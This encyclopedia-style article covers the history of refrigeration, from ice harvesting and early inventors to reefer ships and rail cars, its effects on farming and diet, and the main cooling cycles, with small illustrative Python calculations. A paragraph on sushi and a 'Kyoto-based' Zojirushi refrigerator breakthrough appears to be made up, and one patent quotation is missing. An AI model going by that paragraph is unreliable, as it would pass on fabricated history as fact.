Despite the difficulties of harvesting ice, Frederic Tudor thought that he could capitalize on this new commodity by harvesting ice in New England and shipping it to the Caribbean islands as well as the southern states. In the beginning, Tudor lost thousands of dollars, but eventually turned a profit as he constructed icehouses in Charleston, Virginia and in the Cuban port town of Havana. These icehouses as well as better insulated ships helped reduce ice wastage from 66% to 8%. This efficiency gain influenced Tudor to expand his ice market to other towns with icehouses such as New Orleans and Savannah. This ice market further expanded as harvesting ice became faster and cheaper after one of Tudor's suppliers, Nathaniel Wyeth, invented a horse-drawn ice cutter in 1825. This invention as well as Tudor's success inspired others to get involved in the ice trade and the ice industry grew.
Ice became a mass-market commodity by the early 1830s, with the price of ice dropping from six cents per pound to half a cent per pound. In New York City, ice consumption increased from 12,000 tons in 1843 to 100,000 tons in 1856. Boston's consumption leapt from 6,000 tons to 85,000 tons during that same period. Ice harvesting created a "cooling culture" as the majority of people used ice and iceboxes to store their dairy products, fish, meat, and even fruits and vegetables. These early cold storage practices paved the way for many Americans to accept the refrigeration technology that would soon take over the country. [ 17 ] [ 18 ]
The history of artificial refrigeration began when Scottish professor William Cullen designed a small refrigerating machine in 1755. Cullen used a pump to create a partial vacuum over a container of diethyl ether , which then boiled , absorbing heat from the surrounding air. [ 19 ] The experiment even created a small amount of ice, but had no practical application at that time.
In 1758, Benjamin Franklin and John Hadley , professor of chemistry, collaborated on a project investigating the principle of evaporation as a means to rapidly cool an object at Cambridge University , England . They confirmed that the evaporation of highly volatile liquids, such as alcohol and ether, could be used to drive down the temperature of an object past the freezing point of water. They conducted their experiment with the bulb of a mercury thermometer as their object and with a bellows used to quicken the evaporation; they lowered the temperature of the thermometer bulb down to −14 °C (7 °F), while the ambient temperature was 18 °C (65 °F). They noted that soon after they passed the freezing point of water 0 °C (32 °F), a thin film of ice formed on the surface of the thermometer's bulb and that the ice mass was about 6.4 millimetres ( 1 ⁄ 4 in) thick when they stopped the experiment upon reaching −14 °C (7 °F). Franklin wrote, "From this experiment, one may see the possibility of freezing a man to death on a warm summer's day". [ 20 ] In 1805, American inventor Oliver Evans described a closed vapor-compression refrigeration cycle for the production of ice by ether under vacuum.
In 1820, the English scientist Michael Faraday liquefied ammonia and other gases by using high pressures and low temperatures, and in 1834, an American expatriate to Great Britain, Jacob Perkins , built the first working vapor-compression refrigeration system in the world. It was a closed-cycle that could operate continuously, as he described in his patent:
His prototype system worked although it did not succeed commercially. [ 21 ]
In 1842, a similar attempt was made by American physician, John Gorrie , [ 22 ] who built a working prototype, but it was a commercial failure. Like many of the medical experts during this time, Gorrie thought too much exposure to tropical heat led to mental and physical degeneration, as well as the spread of diseases such as malaria. [ 23 ] He conceived the idea of using his refrigeration system to cool the air for comfort in homes and hospitals to prevent disease. American engineer Alexander Twining took out a British patent in 1850 for a vapour compression system that used ether.
The first practical vapour-compression refrigeration system was built by James Harrison , a British journalist who had emigrated to Australia . His 1856 patent was for a vapour-compression system using ether, alcohol, or ammonia. He built a mechanical ice-making machine in 1851 on the banks of the Barwon River at Rocky Point in Geelong , Victoria , and his first commercial ice-making machine followed in 1854. Harrison also introduced commercial vapour-compression refrigeration to breweries and meat-packing houses, and by 1861, a dozen of his systems were in operation. He later entered the debate of how to compete against the American advantage of unrefrigerated beef sales to the United Kingdom . In 1873 he prepared the sailing ship Norfolk for an experimental beef shipment to the United Kingdom, which used a cold room system instead of a refrigeration system. The venture was a failure as the ice was consumed faster than expected.
The first gas absorption refrigeration system, using gaseous ammonia dissolved in water (referred to as "aqua ammonia"), was developed by Ferdinand Carré of France in 1859 and patented in 1860. Carl von Linde, an engineer specializing in steam locomotives and professor of engineering at the Technological University of Munich in Germany, began researching refrigeration in the 1860s and 1870s in response to demand from brewers for a technology that would allow year-round, large-scale production of lager; he patented an improved method of liquefying gases in 1876. [ 24 ] His new process made it possible to use gases such as ammonia, sulfur dioxide (SO2) and methyl chloride (CH3Cl) as refrigerants, and they were widely used for that purpose until the late 1920s.
Thaddeus Lowe , an American balloonist, held several patents on ice-making machines. His "Compression Ice Machine" would revolutionize the cold-storage industry. In 1869, he and other investors purchased an old steamship onto which they loaded one of Lowe's refrigeration units and began shipping fresh fruit from New York to the Gulf Coast area, and fresh meat from Galveston, Texas back to New York, but because of Lowe's lack of knowledge about shipping, the business was a costly failure.
In 1842, John Gorrie created a system capable of refrigerating water to produce ice. Although it was a commercial failure, it inspired scientists and inventors around the world. France's Ferdinand Carré was among those inspired, and he created an ice-producing system that was simpler and smaller than Gorrie's. During the Civil War, cities such as New Orleans could no longer get ice from New England via the coastal ice trade. Carré's refrigeration system became the solution to New Orleans' ice problems and, by 1865, the city had three of Carré's machines. [ 25 ] In 1867, in San Antonio, Texas, a French immigrant named Andrew Muhl built an ice-making machine to help service the expanding beef industry before moving it to Waco in 1871. In 1873, the patent for this machine was contracted by the Columbus Iron Works, a company acquired by the W.C. Bradley Co., which went on to produce the first commercial ice-makers in the US.
By the 1870s, breweries had become the largest users of harvested ice. Though the ice-harvesting industry had grown immensely by the turn of the 20th century, pollution and sewage had begun to creep into natural ice, making it a problem in the metropolitan suburbs. Eventually, breweries began to complain of tainted ice. Public concern for the purity of the water from which ice was formed began to increase in the early 1900s with the rise of germ theory. Numerous media outlets published articles connecting diseases such as typhoid fever with natural ice consumption. This caused ice harvesting to become illegal in certain areas of the country. All of these scenarios increased the demand for modern refrigeration and manufactured ice. Ice-producing machines like Carré's and Muhl's were looked to as a means of producing ice to meet the needs of grocers, farmers, and food shippers. [ 26 ] [ 27 ]
Refrigerated railroad cars were introduced in the US in the 1840s for short-run transport of dairy products, but these used harvested ice to maintain a cool temperature. [ 28 ]
The new refrigerating technology first met with widespread industrial use as a means to freeze meat supplies for transport by sea in reefer ships from the British Dominions and other countries to the British Isles . Although not actually the first to achieve successful transportation of frozen goods overseas (the Strathleven had arrived at the London docks on 2 February 1880 with a cargo of frozen beef, mutton and butter from Sydney and Melbourne [ 29 ] ), the breakthrough is often attributed to William Soltau Davidson , an entrepreneur who had emigrated to New Zealand . Davidson thought that Britain's rising population and meat demand could mitigate the slump in world wool markets that was heavily affecting New Zealand. After extensive research, he commissioned the Dunedin to be refitted with a compression refrigeration unit for meat shipment in 1881. On February 15, 1882, the Dunedin sailed for London with what was to be the first commercially successful refrigerated shipping voyage, and the foundation of the refrigerated meat industry . [ 30 ]
The Times commented "Today we have to record such a triumph over physical difficulties, as would have been incredible, even unimaginable, a very few days ago...". The Marlborough, sister ship to the Dunedin, was immediately converted and joined the trade the following year, along with the rival New Zealand Shipping Company vessel Mataurua, while the German steamer Marsala began carrying frozen New Zealand lamb in December 1882. Within five years, 172 shipments of frozen meat were sent from New Zealand to the United Kingdom, of which only 9 had significant amounts of meat condemned. Refrigerated shipping also led to a broader meat and dairy boom in Australasia and South America. J & E Hall of Dartford, England outfitted the SS Selembria with a vapor compression system to bring 30,000 carcasses of mutton from the Falkland Islands in 1886. [ 31 ] In the years ahead, the industry rapidly expanded to Australia, Argentina and the United States.
By the 1890s, refrigeration played a vital role in the distribution of food. The meat-packing industry relied heavily on natural ice in the 1880s and continued to rely on manufactured ice as those technologies became available. [ 32 ] By 1900, the meat-packing houses of Chicago had adopted ammonia-cycle commercial refrigeration. By 1914, almost every location used artificial refrigeration. The major meat packers , Armour, Swift, and Wilson, had purchased the most expensive units which they installed on train cars and in branch houses and storage facilities in the more remote distribution areas.
By the middle of the 20th century, refrigeration units were designed for installation on trucks or lorries. Refrigerated vehicles are used to transport perishable goods, such as frozen foods, fruit and vegetables, and temperature-sensitive chemicals. Most modern transport refrigeration units keep the temperature between −40 and +20 °C, and refrigerated vehicles have a maximum load of around 24,000 kg gross weight (in Europe).
Although commercial refrigeration quickly progressed, it had limitations that prevented it from moving into the household. First, most refrigerators were far too large. Some of the commercial units being used in 1910 weighed between five and two hundred tons. Second, commercial refrigerators were expensive to produce, purchase, and maintain. Lastly, these refrigerators were unsafe. It was not uncommon for commercial refrigerators to catch fire, explode, or leak toxic gases. Refrigeration did not become a household technology until these three challenges were overcome. [ 33 ]
During the early 1800s, consumers preserved their food by storing food and ice purchased from ice harvesters in iceboxes. In 1803, Thomas Moore patented a metal-lined butter-storage tub which became the prototype for most iceboxes. These iceboxes were used until nearly 1910 and the technology did not progress. In fact, consumers that used the icebox in 1910 faced the same challenge of a moldy and stinky icebox that consumers had in the early 1800s. [ 34 ]
General Electric (GE) was one of the first companies to overcome these challenges. In 1911, GE released a household refrigeration unit that was powered by gas. The use of gas eliminated the need for an electric compressor motor and decreased the size of the refrigerator. However, electric companies that were customers of GE did not benefit from a gas-powered unit, so GE invested in developing an electric model. In 1927, GE released the Monitor Top, one of the first widely adopted household refrigerators to run on electricity. [ 35 ]
In 1930, Frigidaire, one of GE's main competitors, synthesized Freon. [ 36 ] With the invention of synthetic refrigerants based mostly on chlorofluorocarbon (CFC) chemistry, safer refrigerators became possible for home and consumer use. Freon led to the development of smaller, lighter, and cheaper refrigerators. The average price of a refrigerator dropped from $275 to $154 with the synthesis of Freon, and this lower price allowed ownership of refrigerators in American households to exceed 50% by 1940. [ 37 ] Freon is a trademark of the DuPont Corporation and refers to these CFC, and later hydrochlorofluorocarbon (HCFC) and hydrofluorocarbon (HFC), refrigerants developed in the late 1920s. These refrigerants were considered at the time to be less harmful than the refrigerants then in common use, including methyl formate, ammonia, methyl chloride, and sulfur dioxide. The intent was to provide refrigeration equipment for home use without danger, and these CFC refrigerants answered that need. In the 1970s, though, the compounds were found to be reacting with atmospheric ozone, an important protection against solar ultraviolet radiation, and their use as refrigerants worldwide was curtailed in the Montreal Protocol of 1987.
In the last century, refrigeration allowed new settlement patterns to emerge. The technology allowed new areas to be settled that are not on a natural channel of transport, such as a river, valley trail or harbor, and that might otherwise not have been settled. Refrigeration gave early settlers opportunities to expand westward and into rural areas that were unpopulated, and these new settlers, with rich and untapped soil, saw an opportunity to profit by sending raw goods to the eastern cities and states. In the 20th century, refrigeration made "Galactic Cities" such as Dallas, Phoenix, and Los Angeles possible.
The refrigerated rail car (refrigerated van or refrigerator car), along with the dense railroad network, became an exceedingly important link between the marketplace and the farm, allowing for a national market rather than just a regional one. Before the invention of the refrigerated rail car, it was impossible to ship perishable food products long distances. The beef packing industry made the first demand push for refrigerated cars, but the railroad companies were slow to adopt the new invention because of their heavy investments in cattle cars, stockyards, and feedlots. [ 38 ] Refrigerated cars were also complex and costly compared to other rail cars, which further slowed their adoption. Once the cars did come into use, the beef packing industry dominated the refrigerated rail car business through its ability to control ice plants and set icing fees. The United States Department of Agriculture estimated that, in 1916, over sixty-nine percent of the cattle slaughtered in the country were processed in plants involved in interstate trade. The same companies later extended refrigerated transport to vegetables and fruit, since the meat packers owned much of the expensive machinery, such as refrigerated cars and cold storage facilities, that allowed them to distribute all types of perishable goods effectively. During World War I, a national refrigerator car pool was established by the United States Railroad Administration to deal with the problem of idle cars, and it was continued after the war. [ 39 ] The idle car problem was that refrigerated cars sat unused between seasonal harvests, so very expensive cars spent a good portion of the year in rail yards earning no revenue for their owners. The car pool was a system in which cars were distributed to areas as crops matured, ensuring maximum use of the cars. Refrigerated rail cars moved eastward from vineyards, orchards, fields, and gardens in western states to satisfy America's consuming market in the east. [ 40 ] The refrigerated car made it possible to transport perishable crops hundreds and even thousands of kilometres or miles, and its most noticeable effect was a regional specialization of vegetables and fruits. The refrigerated rail car was widely used for the transportation of perishable goods up until the 1950s. By the 1960s, the nation's interstate highway system was sufficiently complete that trucks could carry the majority of perishable food loads, pushing out the old system of refrigerated rail cars. [ 41 ]
The widespread use of refrigeration allowed a vast number of new agricultural opportunities to open up in the United States. New markets emerged throughout the United States in areas that were previously uninhabited and far removed from heavily populated areas. New agricultural opportunity presented itself in areas that were considered rural, such as states in the south and in the west. Shipments on a large scale from the south and from California were made around the same time, although natural ice from the Sierras was used in California rather than manufactured ice as in the south. [ 42 ] Refrigeration allowed many areas to specialize in the growing of specific fruits. California specialized in several fruits, including grapes, peaches, pears, plums, and apples, while Georgia became famous specifically for its peaches. In California, the acceptance of refrigerated rail cars led to an increase from 4,500 carloads in 1895 to between 8,000 and 10,000 carloads in 1905. [ 43 ] The Gulf States, Arkansas, Missouri and Tennessee entered into strawberry production on a large scale, while Mississippi became the center of the tomato industry. New Mexico, Colorado, Arizona, and Nevada grew cantaloupes. Without refrigeration, none of this would have been possible. By 1917, well-established fruit and vegetable areas that were close to eastern markets felt the pressure of competition from these distant specialized centers. [ 44 ] Refrigeration was not limited to meat, fruit and vegetables; it also encompassed dairy products and dairy farms. In the early twentieth century, large cities got their dairy supply from farms as far away as 640 kilometres (400 mi). Dairy products were not as easily transported over great distances as fruits and vegetables, owing to their greater perishability. Refrigeration made production possible in the west, far from eastern markets, so much so that dairy farmers could pay the transportation cost and still undersell their eastern competitors. [ 45 ] Refrigeration and the refrigerated rail car gave opportunity to areas with rich soil far from natural channels of transport such as rivers, valley trails, or harbors. [ 46 ]
"Edge city" was a term coined by Joel Garreau , whereas the term "galactic city" was coined by Lewis Mumford . These terms refer to a concentration of business, shopping, and entertainment outside a traditional downtown or central business district in what had previously been a residential or rural area. There were several factors contributing to the growth of these cities such as Los Angeles, Las Vegas, Houston, and Phoenix. The factors that contributed to these large cities include reliable automobiles, highway systems, refrigeration, and agricultural production increases. Large cities such as the ones mentioned above have not been uncommon in history, but what separates these cities from the rest are that these cities are not along some natural channel of transport, or at some crossroad of two or more channels such as a trail, harbor, mountain, river, or valley. These large cities have been developed in areas that only a few hundred years ago would have been uninhabitable. Without a cost efficient way of cooling air and transporting water and food from great distances, these large cities would have never developed. The rapid growth of these cities was influenced by refrigeration and an agricultural productivity increase, allowing more distant farms to effectively feed the population. [ 46 ]
Agriculture's role in developed countries has drastically changed in the last century due to many factors, including refrigeration. Statistics from the 2007 census give information on the large concentration of agricultural sales coming from a small portion of the existing farms in the United States today. This is partly a result of the market created for the frozen meat trade by the first successful shipment of frozen sheep carcasses from New Zealand in the 1880s. As the market continued to grow, regulations on food processing and quality began to be enforced. Eventually, electricity was introduced into rural homes in the United States, which allowed refrigeration technology to continue to expand on the farm, increasing output per person. Today, refrigeration's use on the farm reduces humidity levels, avoids spoiling due to bacterial growth, and assists in preservation.
The introduction of refrigeration and the evolution of additional technologies drastically changed agriculture in the United States. At the beginning of the 20th century, farming was a common occupation and lifestyle for United States citizens, and most farmers actually lived on their farms. In 1935, there were 6.8 million farms in the United States and a population of 127 million. Yet, while the United States population has continued to climb, the number of citizens pursuing agriculture continues to decline. Based on the 2007 US Census, less than one percent of a population of 310 million people claim farming as an occupation today. However, the growing population has led to a growing demand for agricultural products, which is met through a greater variety of crops, fertilizers, pesticides, and improved technology. Improved technology has decreased the risk and time involved in agricultural management and allows larger farms to increase their output per person to meet society's demand. [ 47 ]
Prior to 1882, the South Island of New Zealand had been experimenting with sowing grass and crossbreeding sheep, which immediately gave its farmers economic potential in the exportation of meat. In 1882, the first successful shipment of sheep carcasses was sent from Port Chalmers in Dunedin, New Zealand, to London. By the 1890s, the frozen meat trade had become increasingly profitable in New Zealand, especially in Canterbury, where 50% of exported sheep carcasses came from in 1900. It was not long before Canterbury meat was known for its high quality, creating a demand for New Zealand meat around the world. In order to meet this new demand, farmers improved their feed so sheep could be ready for slaughter in only seven months. This new method of shipping led to an economic boom in New Zealand by the mid-1890s. [ 48 ]
In the United States, the Meat Inspection Act of 1891 was put in place because local butchers felt the refrigerated railcar system was unwholesome. [ 49 ] When meat packing began to take off, consumers became nervous about the quality of the meat for consumption. Upton Sinclair's 1906 novel The Jungle brought negative attention to the meat packing industry by drawing to light unsanitary working conditions and the processing of diseased animals. The book caught the attention of President Theodore Roosevelt, and the 1906 Meat Inspection Act was put into place as an amendment to the Meat Inspection Act of 1891. This new act focused on the quality of the meat and the environment in which it was processed. [ 50 ]
In the early 1930s, 90 percent of the urban population of the United States had electric power, in comparison to only 10 percent of rural homes. At the time, power companies did not feel that extending power to rural areas (rural electrification) would produce enough profit to make it worth their while. However, in the midst of the Great Depression, President Franklin D. Roosevelt realized that rural areas would continue to lag behind urban areas in both poverty and production if they were not electrically wired. On May 11, 1935, the president signed an executive order creating the Rural Electrification Administration, also known as the REA. The agency provided loans to fund electric infrastructure in rural areas. In just a few years, 300,000 people in rural areas of the United States had received power in their homes.
While electricity dramatically improved working conditions on farms, it also had a large impact on the safety of food production. Refrigeration systems were introduced to the farming and food distribution processes, which helped in food preservation and kept food supplies safe . Refrigeration also allowed for shipment of perishable commodities throughout the United States. As a result, United States farmers quickly became the most productive in the world, [ 51 ] and entire new food systems arose.
In order to reduce humidity levels and spoiling due to bacterial growth, refrigeration is used for meat, produce, and dairy processing in farming today. Refrigeration systems are used most heavily in the warmer months for farm produce, which must be cooled as soon as possible in order to meet quality standards and increase shelf life. Meanwhile, dairy farms refrigerate milk year round to avoid spoiling. [ 52 ]
In the late 19th century and into the very early 20th century, except for staple foods (sugar, rice, and beans) that needed no refrigeration, the available foods were affected heavily by the seasons and by what could be grown locally. [ 53 ] [ 54 ] Refrigeration has removed these limitations. Refrigeration played a large part in the feasibility and then popularity of the modern supermarket. Fruits and vegetables out of season, or grown in distant locations, are now available at relatively low prices. Refrigerators have led to a huge increase in meat and dairy products as a portion of overall supermarket sales. [ 55 ] As well as changing the goods purchased at the market, the ability to store these foods for extended periods of time has led to an increase in leisure time. [ citation needed ] Prior to the advent of the household refrigerator, people would have to shop daily for the supplies needed for their meals. [ 56 ] [ 57 ]
The introduction of refrigeration allowed for the hygienic handling and storage of perishables, [ 58 ] and as such promoted output growth, consumption, and the availability of nutrition. The shift away from heavily salted preserved foods also moved diets toward more manageable sodium levels. The ability to move and store perishables such as meat and dairy led to a 1.7% annual increase in dairy consumption and a 1.25% annual increase in overall protein intake in the US after the 1890s. [ 59 ]
People were not only consuming these perishables because it became easier for them to store the foods themselves, but also because the innovations in refrigerated transportation and storage led to less spoilage and waste, thereby driving the prices of these products down. Refrigeration accounts for at least 5.1% of the increase in adult stature (in the US) through improved nutrition, [ 60 ] [ 61 ] and when the indirect effects associated with improvements in the quality of nutrients and the reduction in illness are additionally factored in, the overall impact becomes considerably larger. [ 59 ] Recent studies have also shown a negative relationship between the number of refrigerators in a household and the rate of gastric cancer mortality. [ 62 ]
Probably the most widely used current applications of refrigeration are for air conditioning of private homes and public buildings, and refrigerating foodstuffs in homes, restaurants and large storage warehouses. The use of refrigerators and walk-in coolers and freezers in kitchens, factories and warehouses [ 63 ] [ 64 ] [ 65 ] [ 66 ] [ 67 ] for storing and processing fruits and vegetables has allowed adding fresh salads to the modern diet year round, and storing fish and meats safely for long periods.
The optimum temperature range for perishable food storage is 3 to 5 °C (37 to 41 °F). [ 68 ]
In commerce and manufacturing, there are many uses for refrigeration. Refrigeration is used to liquefy gases – oxygen , nitrogen , propane , and methane , for example. In compressed air purification, it is used to condense water vapor from compressed air to reduce its moisture content. In oil refineries , chemical plants , and petrochemical plants, refrigeration is used to maintain certain processes at their needed low temperatures (for example, in alkylation of butenes and butane to produce a high- octane gasoline component). Metal workers use refrigeration to temper steel and cutlery. When transporting temperature-sensitive foodstuffs and other materials by trucks, trains, airplanes and seagoing vessels, refrigeration is a necessity.
Dairy products are constantly in need of refrigeration, [ 8 ] [ 69 ] and it was only discovered in the past few decades that eggs needed to be refrigerated during shipment rather than waiting to be refrigerated after arrival at the grocery store. Meats, poultry and fish all must be kept in climate-controlled environments before being sold. [ 70 ] Refrigeration also helps keep fruits and vegetables edible longer. [ 70 ]
One of the most influential uses of refrigeration was in the development of the sushi / sashimi industry in Japan. [ 71 ] [ 72 ] Before the discovery of refrigeration, many sushi connoisseurs were at risk of contracting diseases. The dangers of unrefrigerated sashimi were not brought to light for decades due to the lack of research and healthcare distribution across rural Japan. Around mid-century, the Zojirushi corporation, based in Kyoto, made breakthroughs in refrigerator designs, making refrigerators cheaper and more accessible for restaurant proprietors and the general public.
Methods of refrigeration can be classified as non-cyclic , cyclic , thermoelectric and magnetic .
This refrigeration method cools a contained area by melting ice, or by sublimating dry ice. [ 73 ] Perhaps the simplest example is a portable cooler, into which items are placed and ice is then poured over the top. Regular ice can maintain temperatures near, but not below, the freezing point, unless salt is used to cool the ice further (as in a traditional ice-cream maker). Dry ice can reliably bring the temperature well below the freezing point of water.
This consists of a refrigeration cycle, where heat is removed from a low-temperature space or source and rejected to a high-temperature sink with the help of external work, and its inverse, the thermodynamic power cycle . In the power cycle, heat is supplied from a high-temperature source to the engine, part of the heat being used to produce work and the rest being rejected to a low-temperature sink. This satisfies the second law of thermodynamics .
A refrigeration cycle describes the changes that take place in the refrigerant as it alternately absorbs and rejects heat as it circulates through a refrigerator. The term is also applied to heating, ventilation, air conditioning, and refrigeration (HVACR) work when describing the "process" of refrigerant flow through an HVACR unit, whether it is a packaged or split system.
Heat naturally flows from hot to cold. Work is applied to cool a living space or storage volume by pumping heat from a lower temperature heat source into a higher temperature heat sink. Insulation is used to reduce the work and energy needed to achieve and maintain a lower temperature in the cooled space. The operating principle of the refrigeration cycle was described mathematically by Sadi Carnot in 1824 as a heat engine .
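Carnot's analysis also gives the theoretical upper bound on performance for any refrigerator operating between two fixed temperatures. A minimal sketch with illustrative temperatures (not taken from any specific system):

```python
# Ideal (Carnot) coefficient of performance for a refrigerator:
# COP_Carnot = T_cold / (T_hot - T_cold), with temperatures in kelvin.
def carnot_cop(t_cold_c: float, t_hot_c: float) -> float:
    t_cold = t_cold_c + 273.15
    t_hot = t_hot_c + 273.15
    return t_cold / (t_hot - t_cold)

# Example: keeping a cold space at 5 degC while rejecting heat at 35 degC.
print(round(carnot_cop(5.0, 35.0), 2))  # ~9.27; real systems achieve far less
```

Real machines fall well short of this limit because of friction, finite temperature differences across heat exchangers, and other irreversibilities.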
The most common types of refrigeration systems use the reverse-Rankine vapor-compression refrigeration cycle, although absorption heat pumps are used in a minority of applications.
Cyclic refrigeration can be classified as vapor cycle refrigeration or gas cycle refrigeration.
Vapor cycle refrigeration can further be classified as vapor-compression refrigeration or vapor-absorption refrigeration.
The vapor-compression cycle is used in most household refrigerators as well as in many large commercial and industrial refrigeration systems. Figure 1 provides a schematic diagram of the components of a typical vapor-compression refrigeration system.
The thermodynamics of the cycle can be analyzed on a diagram [ 74 ] as shown in Figure 2. In this cycle, a circulating refrigerant such as a low-boiling hydrocarbon or hydrofluorocarbon enters the compressor as a vapor. From point 1 to point 2, the vapor is compressed at constant entropy and exits the compressor superheated: it is at a higher temperature, but its pressure is still below the saturation vapor pressure corresponding to that temperature. From point 2 to point 3 and on to point 4, the vapor travels through the condenser, which first cools the vapor until it starts condensing, and then condenses it into a liquid by removing additional heat at constant pressure and temperature. Between points 4 and 5, the liquid refrigerant goes through the expansion valve (also called a throttle valve) where its pressure abruptly decreases, causing flash evaporation and auto-refrigeration of, typically, less than half of the liquid.
That results in a mixture of liquid and vapour at a lower temperature and pressure as shown at point 5. The cold liquid-vapor mixture then travels through the evaporator coil or tubes and is completely vaporized by cooling the warm air (from the space being refrigerated) being blown by a fan across the evaporator coil or tubes. The resulting refrigerant vapour returns to the compressor inlet at point 1 to complete the thermodynamic cycle.
The above discussion is based on the ideal vapour-compression refrigeration cycle, and does not take into account real-world effects like frictional pressure drop in the system, slight thermodynamic irreversibility during the compression of the refrigerant vapor, or non-ideal gas behavior, if any. Vapor compression refrigerators can be arranged in two stages in cascade refrigeration systems, with the second stage cooling the condenser of the first stage. This can be used for achieving very low temperatures.
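As a rough numerical illustration of the ideal cycle described above, the following sketch balances energy around the numbered state points using made-up enthalpy values rather than property-table data for any real refrigerant:

```python
# Idealized vapor-compression cycle energy balance (illustrative numbers only).
# State points follow the description above: 1 = compressor inlet,
# 2 = compressor outlet, 4 = liquid before the expansion valve,
# 5 = evaporator inlet (throttling keeps enthalpy constant: h5 = h4).
h1 = 400.0   # kJ/kg, saturated vapor entering the compressor (assumed)
h2 = 430.0   # kJ/kg, superheated vapor leaving the compressor (assumed)
h4 = 250.0   # kJ/kg, liquid leaving the condenser (assumed)
h5 = h4      # throttling is isenthalpic

compressor_work = h2 - h1          # kJ/kg of refrigerant
refrigeration_effect = h1 - h5     # kJ/kg absorbed in the evaporator
cop = refrigeration_effect / compressor_work
print(round(cop, 2))               # 5.0 with these assumed values
```

With real property data the same bookkeeping applies; the assumed enthalpies here only show how the coefficient of performance falls out of the cycle description.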
More information about the design and performance of vapor-compression refrigeration systems is available in the classic Perry's Chemical Engineers' Handbook . [ 75 ]
In the early years of the twentieth century, the vapor absorption cycle using water-ammonia systems or LiBr -water was popular and widely used. After the development of the vapor compression cycle, the vapor absorption cycle lost much of its importance because of its low coefficient of performance (about one fifth of that of the vapor compression cycle). Today, the vapor absorption cycle is used mainly where fuel for heating is available but electricity is not, such as in recreational vehicles that carry LP gas . It is also used in industrial environments where plentiful waste heat overcomes its inefficiency.
The absorption cycle is similar to the compression cycle, except for the method of raising the pressure of the refrigerant vapor. In the absorption system, the compressor is replaced by an absorber, which dissolves the refrigerant in a suitable liquid; a liquid pump, which raises the pressure; and a generator which, on heat addition, drives off the refrigerant vapor from the high-pressure liquid. Some work is needed by the liquid pump but, for a given quantity of refrigerant, it is much smaller than that needed by the compressor in the vapor compression cycle. In an absorption refrigerator, a suitable combination of refrigerant and absorbent is used. The most common combinations are ammonia (refrigerant) with water (absorbent), and water (refrigerant) with lithium bromide (absorbent).
The main difference from the absorption cycle is that in the adsorption cycle the refrigerant (adsorbate) can be ammonia, water, methanol, etc., while the sorbent is a solid, such as silica gel, activated carbon, or zeolite, whereas in the absorption cycle the absorbent is a liquid.
Adsorption refrigeration technology has been extensively researched over the past 30 years because the operation of an adsorption refrigeration system is often noiseless, non-corrosive and environmentally friendly. [ 76 ]
When the working fluid is a gas that is compressed and expanded but does not change phase, the refrigeration cycle is called a gas cycle. Air is most often the working fluid. As there is no condensation and evaporation intended in a gas cycle, the components corresponding to the condenser and evaporator in a vapor compression cycle are instead hot and cold gas-to-gas heat exchangers.
The gas cycle is less efficient than the vapor compression cycle because the gas cycle works on the reverse Brayton cycle instead of the reverse Rankine cycle . As such, the working fluid does not receive and reject heat at constant temperature. In the gas cycle, the refrigeration effect is equal to the product of the specific heat of the gas and the rise in temperature of the gas in the low temperature side. Therefore, for the same cooling load, a gas refrigeration cycle needs a large mass flow rate and is bulky.
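A back-of-the-envelope estimate shows why gas-cycle machines need large mass flow rates; the load, temperature rise, and specific heat below are illustrative assumptions only:

```python
# Gas (reverse Brayton) cycle: refrigeration effect = cp * delta_T per kg of gas.
cp_air = 1.005        # kJ/(kg*K), specific heat of air near ambient conditions
delta_t = 20.0        # K, assumed temperature rise of the gas on the cold side
cooling_load = 50.0   # kW, assumed cooling load

mass_flow = cooling_load / (cp_air * delta_t)   # kg/s of air required
print(round(mass_flow, 2))  # ~2.49 kg/s, large compared with a vapor cycle of the same load
```

By contrast, a vapor-compression machine meeting the same load absorbs latent heat of the order of 150 kJ/kg, so it circulates roughly an order of magnitude less mass.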
Because of their lower efficiency and larger bulk, air cycle coolers are not often used nowadays in terrestrial cooling devices. However, the air cycle machine is very common on gas turbine -powered jet aircraft as cooling and ventilation units, because compressed air is readily available from the engines' compressor sections. Such units also serve the purpose of pressurizing the aircraft.
Thermoelectric cooling uses the Peltier effect to create a heat flux at the junction between two types of material. [ 77 ] This effect is commonly used in camping and portable coolers and for cooling electronic components [ 78 ] and small instruments. Peltier coolers are often used where a traditional vapor-compression refrigerator would be impractical or take up too much space, and in cooled image sensors as an easy, compact and lightweight, if inefficient, way to achieve very low temperatures. In the latter case, two or more Peltier elements are arranged in a cascade refrigeration configuration, stacked on top of each other with each stage larger than the one before it, [ 79 ] [ 80 ] [ 81 ] in order to extract the heat load plus the waste heat generated by the previous stages. Peltier cooling has a low COP (efficiency) compared with that of the vapor-compression cycle, so it emits more waste heat (heat generated by the Peltier element or cooling mechanism) and consumes more power for a given cooling capacity. [ 82 ]
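A common way to estimate the behaviour of a single-stage Peltier module is a simple lumped-parameter model; the sketch below uses placeholder module coefficients, not data for any particular device:

```python
# Lumped model of a single-stage Peltier (thermoelectric) cooler.
# Heat pumped at the cold side: Qc = S*Tc*I - 0.5*I^2*R - K*(Th - Tc)
# Electrical input power:       P  = S*(Th - Tc)*I + I^2*R
S = 0.05     # V/K, module Seebeck coefficient (assumed)
R = 2.0      # ohm, module electrical resistance (assumed)
K = 0.5      # W/K, module thermal conductance (assumed)
Tc, Th = 285.0, 310.0   # K, cold- and hot-side temperatures (assumed)
I = 3.0      # A, drive current (assumed)

Qc = S * Tc * I - 0.5 * I**2 * R - K * (Th - Tc)   # net cooling power, W
P = S * (Th - Tc) * I + I**2 * R                   # electrical input, W
print(round(Qc, 1), round(Qc / P, 2))              # ~21.3 W pumped at a COP of ~0.98
```

The COP below 1 in this illustrative case reflects the point made above: for the same cooling duty, a Peltier stage typically rejects much more total heat than a vapor-compression machine.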
Magnetic refrigeration, or adiabatic demagnetization , is a cooling technology based on the magnetocaloric effect, an intrinsic property of magnetic solids. The refrigerant is often a paramagnetic salt , such as cerium magnesium nitrate . The active magnetic dipoles in this case are those of the electron shells of the paramagnetic atoms.
A strong magnetic field is applied to the refrigerant, forcing its various magnetic dipoles to align and putting these degrees of freedom of the refrigerant into a state of lowered entropy . A heat sink then absorbs the heat released by the refrigerant due to its loss of entropy. Thermal contact with the heat sink is then broken so that the system is insulated, and the magnetic field is switched off. This increases the heat capacity of the refrigerant, thus decreasing its temperature below the temperature of the heat sink.
Because few materials exhibit the needed properties at room temperature, applications have so far been limited to cryogenics and research.
